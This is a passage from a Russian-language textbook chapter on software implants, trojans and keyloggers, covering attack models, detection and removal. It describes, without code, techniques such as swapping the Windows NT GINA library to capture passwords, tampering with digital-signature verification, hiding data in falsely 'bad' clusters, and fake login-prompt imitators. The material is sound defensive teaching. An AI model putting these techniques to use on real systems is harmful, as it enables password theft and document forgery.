  • навязывание определенных режимов работы (например, блокировании записи на диск при удалении информации, при этом информация, которую требуется удалить, не уничтожается и может быть впоследствии скопирована хакером).

У всех программных закладок (независимо от метода их внедрения в компьютерную систему, срока их пребывания в оперативной памяти и назначения) имеется одна важная общая черта: они обязательно выполняют операцию записи в оперативную или внешнюю память системы. При отсутствии данной операции никакого негативного влияния программная закладка оказать не может. Ясно, что для целенаправленного воздействия она должна выполнять и операцию чтения, иначе в ней может быть реализована только функция разрушения (например, удаление или замена информации в определенных секторах жесткого диска).

 

2. Модели воздействия программных закладок на компьютеры

Модели воздействия программных закладок на компьютеры

Перехват

В модели перехват программная закладка внедряется в ПЗУ. системное или прикладное программное обеспечение и сохраняет всю или выбранную информацию, вводимую с внешних устройств компьютерной системы или выводимую на эти устройства, в скрытой области памяти локальной или удаленной компьютерной системы. Объектом сохранения, например, могут служить символы, введенные с клавиатуры (все повторяемые два раза последовательности символов), или электронные документы, распечатываемые на принтере.

Данная модель может быть двухступенчатой. На первом этапе сохраняются только, например, имена или начала файлов. На втором накопленные данные анализируются злоумышленником с целью принятия решения о конкретных объектах дальнейшей атаки.

Модель типа "перехват" может быть эффективно использована при атаке на защищенную операционную систему Windows NT. После старта Windows NT на экране компьютерной системы появляется приглашение нажать клавиши <Ctrl>+<Alt>+<Del>. После их нажатия загружается динамическая библиотека MSGINA.DLL, осуществляющая прием вводимого пароля и выполнение процедуры его проверки (аутентификации). Описание всех функций этой библиотеки можно найти в файле Winwlx.h. Также существует простой механизм замены исходной библиотеки MSGINA.DLL на пользовательскую (для этого необходимо просто добавить специальную строку в реестр операционной системы Windows NT и указать местоположение пользовательской библиотеки). В результате злоумышленник может модифицировать процедуру контроля за доступом к компьютерной системе, работающей под управлением Windows NT.

Искажение

В модели искажение программная закладка изменяет информацию, которая записывается в память компьютерной системы в результате работы программ, либо подавляет/инициирует возникновение ошибочных ситуаций в компьютерной системе.

Можно выделить статическое и динамическое искажение. Статическое искажение происходит всего один раз. При этом модифицируются параметры программной среды компьютерной системы, чтобы впоследствии в ней выполнялись нужные злоумышленнику действия. К статическому искажению относится, например, внесение изменений в файл AUTOEXEC.BAT операционной системы Windows 95/98, которые приводят к запуску заданной программы, прежде чем будут запущены все другие, перечисленные в этом файле.

Специалистам российского Федерального агентства правительственной связи и информации (ФАПСИ) удалось выявить при анализе одной из отечественных систем цифровой подписи интересное статистическое искажение Злоумышленник (сотрудник отдела информатизации финансовой организации, в которой была внедрена данная система) исправил в исполняемом ЕХЕ-модуле программы проверки правильности цифровой подписи символьную строку "ПОДПИСЬ НЕКОРРЕКТНА" на символьную строку "ПОДПИСЬ КОРРЕКТНА". В результате вообще перестали фиксироваться документы с неверными цифровыми подписями, и, следовательно, в электронные документы стало можно вносить произвольные изменения уже после их подписания электронной цифровой подписью.

Динамическое искажение заключается в изменении каких-либо параметром системных или прикладных процессов при помощи заранее активизированных закладок. Динамическое искажение можно условно разделить так: искажение на входе (когда на обработку попадает уже искаженный документ) и искажение на выходе (когда искажается информация, отображаемая для восприятия человеком, или предназначенная для работы других программ).

Практика применения цифровой подписи в системах автоматизированного документооборота показала, что именно программная реализация цифровой подписи особенно подвержена влиянию программных закладок типа "динамическое искажение", которые позволяют осуществлять проводки фальшивых финансовых документов и вмешиваться в процесс разрешения споров по фактам неправомерного применения цифровой подписи. Например, в одной из программных реализаций широко известной криптосистемы PGP электронный документ, под которым требовалось поставить цифровую подпись, считывался блоками по 512 байт, причем процесс считывания считался завершенным, если в прочитанном блоке данные занимали меньше 512 байт. Работа одной программной закладки, выявленной специалистами ФАПСИ, основывалась на навязывании длины файла. Эта закладка позволяла считывать только первые 512 байт документа, и в результате цифровая подпись определялась на основе только этих 512 байт. Такая же схема действовала и при проверке поставленной под документом цифровой подписи. Следовательно, оставшаяся часть этого документа могла быть произвольным образом искажена, и цифровая подпись под ним продолжала оставаться "корректной".

Существуют 4 основных способа воздействия программных закладок на цифровую подпись:

  • искажение входной информации (изменяется поступающий на подпись электронный документ);
  • искажение результата проверки истинности цифровой подписи (вне зависимости от результатов работы программы цифровая подпись объявляется подлинной);
  • навязывание длины электронного документа (программе цифровой подписи предъявляется документ меньшей длины, чем на самом деле, и в результате цифровая полнись ставится только под частью исходною документа);
  • искажение программы цифровой подписи (вносятся изменения в исполняемый код программы с целью модификации реализованного алгоритма).

В рамках модели "искажение" также реализуются программные закладки. действие которых основывается на инициировании или подавлении сигнала о возникновении ошибочных ситуаций в компьютерной системе, т. е. тех, которые приводят к отличному от нормального завершению исполняемой программы (предписанного соответствующей документацией).

Для инициирования статической ошибки на устройствах хранения информации создается область, при обращении к которой (чтение, запись, форматирование и т. п.) возникает ошибка, что может затруднить или блокировать некоторые нежелательные для злоумышленника действия системных пли прикладных программ (например, не позволять осуществлять корректно уничтожить конфиденциальную информацию на жестком диске).

При инициировании динамической ошибки для некоторой операции генерируется ложная ошибка из числа тех ошибок, которые могут возникать при выполнении данной операции. Например, для блокирования приема или передачи информации в компьютерной системе может постоянно инициироваться ошибочная ситуация "МОДЕМ ЗАНЯТ". Или при прочтении первого блока информации длиной 512 байт может устанавливаться соответствующий флажок для того, чтобы не допустить прочтения второго и последующих блоков и в итоге подделать цифровую подпись под документом.

Чтобы маскировать ошибочные ситуации, злоумышленники обычно используют подавление статической или динамической ошибки. Целью такого подавления часто является стремление блокировать нормальное функционирование компьютерной системы или желание заставить ее неправильно работать. Чрезвычайно важно, чтобы компьютерная система адекватно реагировала на возникновение всех без исключения ошибочных ситуаций, поскольку отсутствие должной реакции на любую ошибку эквивалентно ее подавлению и может быть использовано злоумышленником. Известен случай успешной атаки пары аргентинских самолетов-торпедоносцев на английский эсминец "Шеффилд", закончившийся нанесением серьезных повреждений этому кораблю. Из-за ошибок в программном обеспечении установленная на нем система противовоздушной обороны не смогла выбрать цель, которую полагалось сбивать первой, поскольку атакующие самолеты летели слишком близко друг от друга.

Разновидностью искажения является также модель типа троянский конь. В этом случае программная закладка встраивается в постоянно используемое программное обеспечение и по некоторому активизирующему событию вызывает возникновение сбойной ситуации в компьютерной системе. Тем самым достигаются сразу две цели: парализуется ее нормальное функционирование, а злоумышленник, получив доступ к компьютерной системе для устранения неполадок, сможет, например, извлечь из нее информацию, перехваченную другими программными закладками. В качестве активизирующего события обычно используется наступление определенного момент;: времени, сигнал из канала модемной связи или состояние некоторых счетчиков (например, счетчика количества запусков программы).

Уборка мусора

Как известно, при хранении компьютерных данных на внешних носителях прямого доступа выделяется несколько уровней иерархии: сектора, кластеры и файлы. Сектора являются единицами хранения информации на аппаратном уровне. Кластеры состоят из одного или нескольких подряд идущих секторов. Файл — это множество кластеров, связанных по определенному закону.

Работа с конфиденциальными электронными документами обычно сводится к последовательности следующих манипуляций с файлами:

  • создание;
  • хранение;
  • коррекция;
  • уничтожение.

Для защиты конфиденциальной информации обычно используется шифрование. Основная угроза исходит отнюдь не от использования нестойких алгоритмов шифрования и "плохих" криптографических ключей (как это может показаться на первый взгляд), а от обыкновенных текстовых редакторов и баз данных, применяемых для создания и коррекции конфиденциальных документов!

Дело в том, что подобные программные средства, как правило, в процессе функционирования создают в оперативной или внешней памяти компьютерной системы временные копии документов, с которыми они работают. Естественно, все эти временные файлы выпадают из поля зрения любых программ шифрования и могут быть использованы злоумышленником для того, чтобы составить представление о содержании хранимых в зашифрованном виде конфиденциальных документов.

Важно помнить и о том, что при записи отредактированной информации меньшего объема в тот же файл, где хранилась исходная информация до начала сеанса ее редактирования, образуются так называемые "хвостовые" кластеры, в которых эта исходная информация полностью сохраняется. И тогда "хвостовые" кластеры не только не подвергаются воздействию программ шифрования, но и остаются незатронутыми даже средствами гарантированного стирания информации. Конечно, рано или поздно информация из "хвостовых" кластеров затирается данными из других файлов, однако по оценкам специалистов ФАПСИ из "хвостовых" кластеров через сутки можно извлечь до 85%, а через десять суток — до 25—40% исходной информации.

Пользователям необходимо иметь в виду и то, что команда удаления файла (DEL) операционной системы DOS2 не изменяет содержания файла, и оно может быть в любой момент восстановлено, если поверх него еще не был записан другой файл. Распространенные средства гарантированного стирания файлов предварительно записывают на его место константы или случайные числа и только после этого удаляют файл стандартными средствами DOS. Однако даже такие мощные средства оказываются бессильными против программных закладок, которые нацелены на то, чтобы увеличить количество остающихся в виде "мусора" фрагментов конфиденциальной информации. Например, программная закладка может инициировать статическую ошибку, пометив один или несколько кластеров из цепочки, входящей в файл, меткой "СБОЙНЫЙ". В результате при удалении файла средствами операционной системы или средствами гарантированного уничтожения та его часть, которая размещена в сбойных кластерах, останется нетронутой и впоследствии может быть восстановлена с помощью стандартных утилит.

Наблюдение и компрометация

Помимо перечисленных, существуют и другие модели воздействия программных закладок на компьютеры. В частности, при использовании модели типа наблюдение программная закладка встраивается в сетевое или телекоммуникационное программное обеспечение. Пользуясь тем, что подобное программное обеспечение всегда находится в состоянии активности, внедренная в него программная закладка может следить за всеми процессами обработки информации в компьютерной системе, а также осуществлять установку и удаление других программных закладок. Модель типа компрометация позволяет получать доступ к информации, перехваченной другими программными закладками. Например, инициируется постоянное обращение к такой информации, приводящее к росту соотношения сигнал/шум. А это, в свою очередь, значительно облегчает перехват побочных излучений данной компьютерной системы и позволяет эффективно выделять сигналы, сгенерированные закладкой типа "компрометация", из общего фона излучения, исходящего от оборудования.

3. Защита от программных закладок

Защита от программных закладок

Задача защиты от программных закладок может рассматриваться в трех принципиально различных вариантах:

  • не допустить внедрения программной закладки в компьютерную систему;
  • выявить внедренную программную закладку;
  • удалить внедренную программную закладку.

При рассмотрении этих вариантов решение задачи защиты от программных закладок сходно с решением проблемы защиты компьютерных систем от вирусов. Как и в случае борьбы с вирусами, задача решается с помощью средств контроля за целостностью запускаемых системных и прикладных программ, а также за целостностью информации, хранимой в компьютерной системе и за критическими для функционирования системы событиями. Однако данные средства действенны только тогда, когда сами они не подвержены влиянию программных закладок, которые могут:

  • навязывать конечные результаты контрольных проверок;
  • влиять на процесс считывания информации и запуск программ, за которыми осуществляется контроль;
  • изменять алгоритмы функционирования средств контроля.

При этом чрезвычайно важно, чтобы включение средств контроля выполнялось до начала воздействия программной закладки либо когда контроль осуществлялся только с использованием программ управления, находящихся в ПЗУ компьютерной системы.

Защита от внедрения программных закладок

Универсальным средством защиты от внедрения программных закладок является создание изолированного компьютера. Компьютер называется изолированным, если выполнены следующие условия:

  • в нем установлена система BIOS, не содержащая программных закладок;
  • операционная система проверена на наличие в ней закладок;
  •  достоверно установлена неизменность BIOS и операционной системы для данного сеанса;
  • на компьютере не запускалось и не запускается никаких иных программ, кроме уже прошедших проверку на присутствие в них закладок;
  • исключен запуск проверенных программ в каких-либо иных условиях. кроме перечисленных выше, т. е. вне изолированного компьютера.

Для определения степени изолированности компьютера может использоваться модель ступенчатого контроля. Сначала проверяется, нет ли изменений в BIOS. Затем, если все в порядке, считывается загрузочный сектор диска и драйверы операционной системы, которые, в свою очередь, также анализируются на предмет внесения в них несанкционированных изменений. И наконец, с помощью операционной системы запускается драйвер контроля вызовов программ, который следит за тем, чтобы в компьютере запускались только проверенные программы.

Интересный метод борьбы с внедрением программных закладок может быть использован в информационной банковской системе, в которой циркулируют исключительно файлы-документы. Чтобы не допустить проникновения программной закладки через каналы связи, в этой системе не допускается прием никакого исполняемого кода. Для распознавания событий типа "ПОЛУЧЕН ИСПОЛНЯЕМЫЙ КОД" и "ПОЛУЧЕН ФАЙЛ-ДОКУМЕНТ" применяется контроль за наличием в файле запрещенных символов: файл признается содержащим исполняемый код, если в нем присутствуют символы, которые никогда не встречаются в файлах-документах.

Выявление внедренной программной закладки

Выявление внедренного кода программной закладки заключается в обнаружении признаков его присутствия в компьютерной системе. Эти признаки можно разделить на следующие два класса:

  • качественные и визуальные;
  • обнаруживаемые средствами тестирования и диагностики.

К качественным и визуальным признакам относятся ощущения и наблюдения пользователя компьютерной системы, который отмечает определенные отклонения в ее работе (изменяется состав и длины файлов, старые файлы куда-то пропадают, а вместо них появляются новые, программы начинают работать медленнее, или заканчивают свою работу слишком быстро, или вообще перестают запускаться). Несмотря на то что суждение о наличии признаков этого класса кажется слишком субъективным, тем не менее, они часто свидетельствуют о наличии неполадок в компьютерной системе и, в частности, о необходимости проведения дополнительных проверок присутствия программных закладок. Например, пользователи пакета шифрования и цифровой подписи "Криптоцентр" с некоторых пор стали замечать, что цифровая подпись под электронными документами ставится слишком быстро. Исследование, проведенное специалистами ФАПСИ, показало присутствие программной закладки, работа которой основывалась на навязывании длины файла. В другом случае тревогу забили пользователи пакета шифрования и цифровой подписи "Криптон", которые с удивлением отметили, что скорость шифрования по криптографическому алгоритму ГОСТ 28147-89 вдруг возросла более, чем в 30 раз. А в третьем случае программная закладка обнаружила свое присутствие в программе клавиатурного ввода тем, что пораженная ею программа перестала нормально работать.

Признаки, выявляемые с помощью средств тестирования и диагностики, характерны как для программных закладок, так и для компьютерных вирусов. Например, загрузочные закладки успешно обнаруживаются антивирусными программами, которые сигнализируют о наличии подозрительного кода в загрузочном секторе диска. С инициированием статической ошибки на дисках хорошо справляется Disk Doctor, входящий в распространенный комплект утилит Norton Utilities. А средства проверки целостности данных на диске типа Adinf позволяют успешно выявлять изменения, вносимые в файлы программными закладками. Кроме того, эффективен поиск фрагментов кода программных закладок по характерным для них последовательностям нулей и единиц (сигнатурам), а также разрешение выполнении только программ с известными сигнатурами.

Удаление внедренной программной закладки

Конкретный способ удаления внедренной программной закладки зависит от метода ее внедрения в компьютерную систему. Если это программно-аппаратная закладка, то следует перепрограммировать ПЗУ компьютера. Если это загрузочная, драйверная, прикладная, замаскированная закладка или закладка- имитатор, то можно заменить их на соответствующую загрузочную запись, драйвер, утилиту, прикладную или служебную программу, полученную от источника, заслуживающего доверия. Наконец, если это исполняемый программный модуль, то можно попытаться добыть его исходный текст, убрать из него имеющиеся закладки или подозрительные фрагменты, а затем заново откомпилировать.

4. Троянские программы

Троянские программы

Троянской программой (троянцем, или троянским конем) называется:

  • программа, которая, являясь частью другой программы с известными пользователю функциями, способна втайне от него выполнять некоторые дополнительные действия с целью причинения ему определенного ущерба;
  • программа с известными ее пользователю функциями, в которую были внесены изменения, чтобы, помимо этих функций, она могла втайне от него выполнять некоторые другие (разрушительные) действия.

Таким образом, троянская программа — это особая разновидность программной закладки. Она дополнительно наделена функциями, о существовании которых пользователь даже не подозревает. Когда троянская программа выполняет эти функции, компьютерной системе наносится определенный ущерб. Однако то, что при одних обстоятельствах причиняет непоправимый вред, при других— может оказаться вполне полезным. К примеру, программу, которая форматирует жесткий диск, нельзя назван. троянской, если она как раз и предназначена для его форматирования (как это делает команда format операционной системы DOS). Но если пользователь, выполняя некоторую программу, совершенно не ждет, что она отформатирует его винчестер, — это и есть самый настоящий троянец.

Короче говоря, троянской можно считать любую программу, которая втайне от пользователя выполняет какие-то нежелательные для него действия. Эти действия могут быть любыми — от определения регистрационных номеров программного обеспечения, установленного на компьютере, до составления списка каталогов на его жестком диске. А сама троянская программа может маскироваться под текстовый редактор, под сетевую утилиту или любую программу, которую пользователь пожелает установить на свой компьютер.

Откуда берутся троянские программы

Троянская программа — это плод труда программиста. Никаким другим способом создать ее невозможно. Программист, пишущий троянскую программу, прекрасно осознает, чего он хочет добиться, и в своих намерениях он всегда весьма далек от альтруизма.

Большинство троянских программ предназначено для сбора конфиденциальной информации. Их задача, чаще всего, состоит в выполнении действий, позволяющих получить доступ к данным, которые не подлежат широкой огласке. К таким данным относятся пользовательские пароли, регистрационные номера программ, сведения о банковских счетах и т. д. Остальные троянцы создаются для причинения прямого ущерба компьютерной системе, приводя ее в неработоспособное состояние.

К последним можно отнести, например, троянскую программу PC CYBORG, которая завлекала ничего не подозревающих пользователей обещаниями предоставить им новейшую информацию о борьбе с вирусом, вызывающим синдром приобретенного иммунодефицита (СПИД). Проникнув в компьютерную систему, PC CYBORG отсчитывала 90 перезагрузок этой системы, а затем прятала все каталоги на ее жестком диске и шифровала находящиеся там файлы.

Другая троянская программа называлась AOLGOLD. Она рассылалась по электронной почте в виде заархивированного файла. В сопроводительном письме, прилагавшемся к этому файлу, говорилось о том, что AOLGOLD предназначена для повышения качества услуг, которые предоставляет своим пользователям крупнейший американский Internet-провайдер America Online (AOL). Архив состоял из двух файлов, один из которых именовался INSTALL.BAT. Пользователь, запустивший INSTALL.BAT, рисковал стереть все файлы из каталогов С:\, C:\DOS, C:\WINDOWS и C:\WINDOWS\SYSTEM на своем жестком диске.

Подобного рода троянские программы, как правило, создаются подростками, которые хотя и одержимы страстью к разрушению, но не имеют глубоких познаний в программировании и поэтому не могут причинить существенный ущерб компьютерным системам, подвергшимся нападению созданных ими троянцев. Например, программа AOLGOLD стирала себя с жесткого диска, будучи запущена из любого другого дискового раздела за исключением С.

Другое дело — троянские программы, авторами которых являются профессиональные программисты, занимающиеся разработкой программного обеспечения в солидных фирмах. Троянцы, входящие в распространенные компьютерные приложения, утилиты и операционные системы, представляют значительно большую угрозу компьютерам, на которых они установлены. поскольку их действия носят не деструктивный характер, а имеют целью сбор конфиденциальной информации о системе. Обнаружить такие троянские программы удается, как правило, чисто случайно. А поскольку программное обеспечение, частью которого они являются, в большинстве случаев используется не только какой-то одной компанией, закупившей это программное обеспечение, но также на крупных Internet-серверах и, кроме того, распространяется через Internet, последствия могут оказаться самыми плачевными.

Случается и так, что троянцы встраиваются в некоторые утилиты программистами, не имеющими никакого отношения к разработке этих утилит. Па-пример, в дистрибутив сканера SATAN, предназначенный для установки на компьютеры с операционной системой Linux, распространявшийся через Internet, попала троянская программа, которая "обосновалась" в утилите fping. При первом же запуске модифицированной утилиты fping в файл /etc/passwd добавлялась запись для пользователя с именем suser, который в результате мог войти в Linux и тайно получить там полномочия администратора. Однако у автора этой троянской программы были явные пробелы в компьютерном образовании. В частности, он не знал некоторых нюансов хранения паролей в операционных системах семейства UNIX. В результате файл /etc/passwd был соответствующим образом изменен всего лишь на двух компьютерах, на которых был установлен этот испорченный дистрибутив сетевого анализатора SATAN для Linux.

Где обитают и как часто встречаются троянские программы

В настоящее время троянские программы можно отыскать практически где угодно. Они написаны для всех без исключения операционных систем и для любых платформ. Не считая случаев, когда троянские программы пишутся самими разработчиками программного обеспечения, троянцы распространяются тем же способом, что и компьютерные вирусы. Поэтому самыми подозрительными на предмет присутствия в них троянцев, в первую очередь, являются бесплатные и условно-бесплатные программы, скачанные из Internet, а также программное обеспечение, распространяемое на пиратских компакт-дисках.

Например, в январе 1999 г. было обнаружено, что популярная утилита TCP Wrapper, предназначенная для администрирования UNIX-систем и бесплатно распространяемая через Internet, на многих ftp-сайтах была заменена внешне похожей на нее программой, которая на самом деле являлась троянцем. После инсталляции он отправлял электронное сообщение по определенным внешним адресам, оповещая своего хозяина об успешном внедрении. Потом он ждал, пока будет установлено удаленное соединение с портом 421 зараженного им компьютера, и предоставлял привилегированные права доступа через этот порт.

Другая троянская программа распространялась среди пользователей AOL в виде вложения в письмо, рассылаемое по электронной почте. Открывшие это вложение заражали свой компьютер троянцем, который пытался найти пароль для подключения к AOL и в случае успеха шифровал его. а потом отсылал электронной почтой куда-то в Китай.

В настоящее время существует целый ряд троянских программ, которые можно совершенно свободно скачать, подключившись к глобальной компьютерной сети Internet. Наибольшую известность среди них получили троянцы Back Orifice, Net Bus и SubSeven. На Web-узле группы разработчиков Back Orifice, которая именует себя Cult of Dead Cow (Культ мертвой коровы), можно даже найти с десяток постеров, которые предназначены для рекламы ее последней разработки — троянца Back Orifice 2000.

Таким образом, троянские программы встречаются довольно часто и, следовательно, представляют серьезную угрозу безопасности компьютерных систем. Даже после того как троянская программа обнаружена, ее вредоносное влияние на компьютерную систему может ощущаться еще в течение очень длительного времени. Ведь зачастую никто не может с уверенностью сказать, насколько сильно пострадала компьютерная система в результате проникновения в нее троянской программы.

Дело в том, что большинство троянцев являются частью других программ, которые хранятся в компьютере в откомпилированном виде. Текст этих программ представляет собой последовательность команд на машинном языке, состоящую из нулей и единиц. Рядовой пользователь, как правило, не имеет ни малейшего понятия о внутренней структуре таких программ. Он просто запускает их на исполнение путем задания имени соответствующей программы в командной строке или двойным щелчком на имени ее файла.

Когда выясняется, что в какую-то откомпилированную программу проник троянец, в сети Internet немедленно начинают распространяться бюллетени с информацией об обнаруженном троянце. Чаще всего в этих бюллетенях кратко сообщается о том, какой вред может причинить данный троянец и где можно найти замену пораженной троянцем программе.

Иногда ущерб, который может нанести троянец, оценить довольно легко. Например, если он предназначен для пересылки по электронной почте содержимого файла /etc/passwd, в котором операционные системы семейства UNIX хранят информацию о пользовательских паролях, достаточно установить "чистую" версию программы взамен той, в которой обосновался этот троянец. Затем пользователи должны будут обновить свои пароли, и на этом борьба с ним успешно завершается.

Однако далеко не всегда степень компрометации компьютерной системы, в которой поселилась троянская программа, бывает так легко определить. Предположим, что цель внедрения троянца состоит в создании дыры в защитных механизмах компьютерной системы, через которую злоумышленник сможет, например, проникать в нее, имея администраторские полномочия. И если взломщик окажется достаточно хитрым и смекалистым, чтобы замести следы своего присутствия в системе путем внесения соответствующих изменений в регистрационные файлы, то определить, насколько глубоко он проник сквозь системные защитные механизмы, будет почти невозможно, если учесть еще тот факт, что саму троянскую программу обнаружат лишь несколько месяцев спустя после ее внедрения в компьютерную систему. В этом случае может понадобиться целиком переустановить операционную  систему и все приложения.

Как распознать троянскую программу

большинство программных средств, предназначенных для защиты от троянских программ, в той или иной степени использует так называемое согласование объектов. При этом в качестве объектов фигурируют файлы и каталоги, а согласование представляет собой способ ответить на вопрос. изменились ли файлы и каталоги с момента последней проверки. В ходе согласования характеристики объектов сравниваются с характеристиками. которыми они обладали раньше. Берется, к примеру, архивная копия системного файла и ее атрибуты сравниваются с атрибутами этого файла, который в настоящий момент находится на жестком диске. Если атрибуты различаются и никаких изменений в операционную систему не вносилось, значит в компьютер, скорее всего, проник троянец.

Одним из атрибутов любого файла является отметка о времени его последней модификации: всякий раз, когда файл открывается, изменяется и сохраняется на диске, автоматически вносятся соответствующие поправки. Однако отметка времени не может служить надежным индикатором наличия в системе троянца. Дело в том, что ею очень легко манипулировать. Можно подкрутить назад системные часы, внести изменения в файл, затем снова вернуть часы в исходное состояние, и отметка о времени модификации файла останется неизменной.

Может быть, иначе обстоит дело с размером файла? Отнюдь. Нередко текстовый файл, который изначально занимал, скажем, 8 Кбайт дискового пространства, после редактирования и сохранения имеет тот же самый размер. Несколько иначе ведут себя двоичные файлы. Вставить в чужую программу фрагмент собственного кода так, чтобы она не утратила работоспособности и в откомпилированном виде сохранила свой размер, достаточно непросто. Поэтому размер файла является более надежным показателем, чем отметка о времени внесения в него последних изменений.

Злоумышленник, решивший запустить в компьютер троянца, обычно пытается сделать его частью системного файла. Такие файлы входят в дистрибутив операционной системы и их присутствие на любом компьютере, где эта операционная система установлена, не вызывает никаких подозрений. Однако любой системный файл имеет вполне определенную длину. Если данный атрибут будет каким-либо образом изменен, это встревожит пользователя.

Зная это, злоумышленник постарается достать исходный текст соответствующей программы и внимательно проанализирует его на предмет присутствия в нем избыточных элементов, которые могут быть удалены безо всякого ощутимого ущерба. Тогда вместо найденных избыточных элементов он вставит в программу своего троянца и перекомпилирует ее заново. Если размер полученного двоичного файла окажется меньше или больше размера исходного, процедура повторяется. И так до тех пор, пока не будет получен файл, размер которого в наибольшей степени близок к оригиналу (если исходный файл достаточно большой, этот процесс может растянуться на несколько дней).

Итак, в борьбе с троянцами положиться на отметку о времени последней модификации файла и его размер нельзя, поскольку злоумышленник может их довольно легко подделать. Более надежной в этом отношении является так называемая контрольная сумма файла. Для ее подсчета элементы файла суммируются, и получившееся в результате число объявляется его контрольной суммой. Например, в операционной системе SunOS существует специальная утилита sum, которая выводит на устройство стандартного вывода STDOUT контрольную сумму файлов, перечисленных в строке аргументов этой утилиты.

Однако и контрольную сумму в общем случае оказывается не так уж трудно подделать. Поэтому для проверки целостности файловой системы компьютера используется особая разновидность алгоритма вычисления контрольной суммы, называемая односторонним хэшированием.

Функция хэширования называется односторонней, если задача отыскания двух аргументов, для которых ее значения совпадают, является труднорешаемой. Отсюда следует, что функция одностороннего хэширования может быть применена для того, чтобы отслеживать изменения, вносимые злоумышленником в файловую систему компьютера, поскольку попытка злоумышленника изменить какой-либо файл так, чтобы значение, полученное путем одностороннего хэширования этого файла, осталось неизменным, обречена на неудачу.

Исторически сложилось так, что большинство утилит, позволяющих бороться с проникновением в компьютерную систему троянских программ путем однонаправленного хэширования файлов, было создано для операционных систем семейства UNIX. Одной из наиболее удобных в эксплуатации и эффективных является утилита Trip Wire, которую можно найти в Internet по адресу http://www.tripwiresecurity.com/. Она позволяет производить однонаправленное хэширование файлов при помощи нескольких алгоритмов, в том числе — MD43, MD54 и SHA5. Вычисленные хэш-значения файлов хранятся в специальной базе данных, которая, в принципе, является самым уязвимым звеном \ утилиты TripWire. Поэтому пользователям TripWire предлагается в обязательном порядке принимать дополнительные меры защиты, чтобы исключить доступ к этой базе данных со стороны злоумышленника (например, помещать ее на съемном носителе, предназначенном только для чтения).

 

Рис. 2.5. Окно антивирусной программы Norton Antivirus 2000

Средства борьбы с троянцами в операционных системах семейства Windows (95/98/NT) традиционно являются частью их антивирусного программною обеспечения. Поэтому, чтобы отлавливать Back Orifice, Net Bus, SubSeven и другие подобные им троянские программы, необходимо обзавестись самым современным антивирусом (например, программой Norton Anuvirus 2000 компании Symantec (рис. 2.1), которая позволяет обнаруживать присутствие   в компьютерной системе наиболее распространенных троянцев и избавляться от них). Следует регулярно проверять свой компьютер на присутствие в нем вирусов.

Тем, кто хочет иметь в своем распоряжении утилиту, предназначенную именно для обнаружения троянцев в компьютерах, которые работают под управлением операционных систем семейства Windows, можно посоветовать обратить свои взоры на программу The Cleaner компании MooSoft Development (http://www.homestead.com/moosoft/ cleaner.html) Эта утилита может быть с успехом использована для борьбы с более чем четырьмя десятками разновидностей троянских программ.

Обзор средств борьбы с троянскими программами был бы далеко не полным, если обойти вниманием недавно появившиеся на рынке программные пакеты, предназначенные для комплексной зашиты от угроз, с которыми сталкиваются пользователи настольных компьютеров при работе в Internet. Одним из таких пакетов является eSafe Protect компании Aladdin Knowledge Systems (демонстрационную версию eSafe Protect можно найти в Internet no адресу www.esafe.com).

Функционально eSafe Protect делится на три компонента — антивирус, персональный брандмауэр и модуль защиты компьютерных ресурсов. Антивирус избавляет компьютер от вредоносных программ благодаря применению антивирусного модуля VisuSafe, сертифицированного американским Национальным агентством компьютерной безопасности. Персональный брандмауэр контролирует весь входящий и исходящий трафик по протоколу TCP/IP, наделяя используемые IP-адреса определенными правами (например, ограничивая доступ в Internet в определенные часы или запрещая посещение некоторых Web-узлов).

Для защиты ресурсов компьютера, на котором установлен программный пакет eSafe Protect, создается специальная изолированная область — так называемая песочница. Все автоматически загружаемые из Internet Java-аплсты и компоненты ActiveX сначала помещаются в "песочницу", где они находятся под неусыпным наблюдением eSafe Protect. Если попавшая в "песочницу" программа попытается выполнить какое-либо недозволенное действие, то оно будет немедленно блокировано. В течение заданного интервала времени (от 1 до 30 дней) каждое приложение, загруженное в компьютер из Internet. проходит "карантинную" проверку в "песочнице". Полученная в холе такой проверки информация заносится в особый журнал. По истечении "карантина" приложение будет выполняться вне "песочницы", однако ему будут дозволены только те действия, перечень которых определяется на основе имеющихся журнальных записей.

Таким образом, по сравнению с другими подобными программными пакетами eSafe Protect обеспечивает наиболее развитые и эффективные средства комплексной зашиты от троянских программ. Входящий в состав eSafe Protect антивирус помогает быстро выявлять троянцев и расправляться с ними, используя технологии, которые хорошо зарекомендовали себя при борьбе с вирусами. Персональный брандмауэр блокирует любые попытки связаться извне с проникшими в компьютерную систему троянскими программами. И наконец с помощью "песочницы" своевременно предотвращается внедрение троянцев в компьютеры под видом Java-аплетов и компонентов ActiveX.

5. Клавиатурные шпионы

 

 

Одна из наиболее распространенных разновидностей программных закладок — клавиатурные шпионы. Такие программные закладки нацелены на перехват паролей пользователей операционной системы, а также на определение их легальных полномочий и прав доступа к компьютерным ресурсам.

Клавиатурные шпионы — явление отнюдь не новое в мире компьютеров. В свое время они разрабатывались и для OS/370, и для UNIX, и для DOS. Их поведение в общем случае является довольно традиционным: типовой клавиатурный шпион обманным путем завладевает пользовательскими паролями, а затем переписывает эти пароли туда, откуда их может без особого труда извлечь злоумышленник. Различия между клавиатурными шпионами касаются только способа, который применяется ими для перехвата пользовательских паролей. Соответственно все клавиатурные шпионы делятся на три типа — имитаторы, фильтры и заместители.

Имитаторы

Клавиатурные шпионы этого типа работают по следующему алгоритму. Злоумышленник внедряет в операционную систему программный модуль, который имитирует приглашение пользователю зарегистрироваться для того, чтобы войти в систему. Затем внедренный модуль (в принятой терминологии — имитатор) переходит в режим ожидания ввода пользовательского идентификатора и пароля. После того как пользователь идентифицирует себя и введет свой пароль, имитатор сохраняет эти данные там, где они доступны злоумышленнику. Далее имитатор инициирует выход из системы (что в большинстве случаев можно сделать программным путем), и в результате перед глазами у ничего не подозревающего пользователя появляется сто одно, но на этот раз уже настоящее приглашение для входа в систему.

Обманутый пользователь, видя, что ему предлагается еще раз внести пароль. приходит к выводу о том, что он допустил какую-то ошибку во время предыдущего ввода пароля, и послушно повторяет всю процедуру входи в систему заново. Некоторые имитаторы для убедительности выдают на экран монитора правдоподобное сообщение о якобы совершенной пользователем ошибке. Например, такое: "НЕВЕРНЫЙ ПАРОЛЬ. ПОПРОБУЙТЕ ЕЩЕ РАЗ".

Написание имитатора не требует от его создателя каких-либо особых навыков. Злоумышленнику, умеющему программировать на одном из универсальных языков программирования (к примеру, на языке BASIC), понадобятся на это считанные часы. Единственная трудность, с которой он может столкнуться, состоит в том, чтобы отыскать в документации соответствующую программную функцию, реализующую выход пользователя из системы.

